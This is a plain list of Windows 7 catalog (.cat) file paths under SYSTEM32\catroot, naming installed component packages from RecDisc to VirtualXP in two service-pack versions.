- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RecDisc-SDP-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RecDisc-SDP-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteAssistance-Package-Client~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteAssistance-Package-Client~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteAssistance-Package-Client~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteAssistance-Package-Client~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteFX-RemoteClient-Setup-LanguagePack~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteFX-RemoteClient-Setup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteFX-VM-Setup-LanguagePack~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteFX-VM-Setup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SampleContent-Music-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SampleContent-Music-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SampleContent-Ringtones-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SampleContent-Ringtones-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SearchEngine-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SearchEngine-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SearchEngine-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SearchEngine-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Basic-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-Enterprise-GVLK-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-Enterprise-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-Enterprise-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-HomeBasic-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-HomeBasic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-HomePremium-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-HomePremium-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-Professional-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-Professional-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-Starter-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-Starter-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-Ultimate-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-Ultimate-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ServicingBaseline-Ultimate-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ServicingBaseline-Ultimate-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ShareMedia-ControlPanel-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ShareMedia-ControlPanel-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ShareMedia-ControlPanel-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ShareMedia-ControlPanel-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-HomeGroup-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-HomeGroup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-HomeGroup-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-HomeGroup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-InboxGames-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-InboxGames-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-InboxGames-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-InboxGames-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-MultiplayerInboxGames-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-MultiplayerInboxGames-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-MultiplayerInboxGames-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-MultiplayerInboxGames-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-PremiumInboxGames-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-PremiumInboxGames-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-PremiumInboxGames-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-PremiumInboxGames-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-SoundThemes-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-SoundThemes-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Sidebar-Killbits-SDP-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Sidebar-Killbits-SDP-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SimpleTCP-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SimpleTCP-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SimpleTCP-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SimpleTCP-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SnippingTool-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SnippingTool-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SnippingTool-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SnippingTool-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SNMP-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SNMP-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SNMP-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SNMP-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Starter-Features-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Starter-Features-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StickyNotes-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StickyNotes-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StickyNotes-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StickyNotes-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StorageService-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StorageService-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StorageService-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StorageService-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SUA-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SUA-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SUA-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SUA-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SystemRestore-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SystemRestore-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SystemRestore-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SystemRestore-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TabletPC-OC-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TabletPC-OC-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TabletPC-OC-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TabletPC-OC-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-CommandLineTools-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-CommandLineTools-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-CommandLineTools-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-CommandLineTools-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-MiscRedirection-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-MiscRedirection-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-MiscRedirection-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-MiscRedirection-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-Publishing-WMIProvider-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-Publishing-WMIProvider-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-Publishing-WMIProvider-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-Publishing-WMIProvider-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-RemoteApplications-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-RemoteApplications-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-RemoteApplications-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-RemoteApplications-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-UsbRedirector-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-UsbRedirector-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-UsbRedirector-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-UsbRedirector-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-WMIProvider-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-WMIProvider-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-WMIProvider-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-WMIProvider-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TFTP-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TFTP-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TFTP-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TFTP-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Tuner-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Tuner-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-UltimateEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-UltimateEdition~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-UltimateEdition~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualPC-Licensing-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualPC-Licensing-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualPC-USB-RPM-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualPC-USB-RPM-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualPC-USB-RPM-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualPC-USB-RPM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualXP-Licensing-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
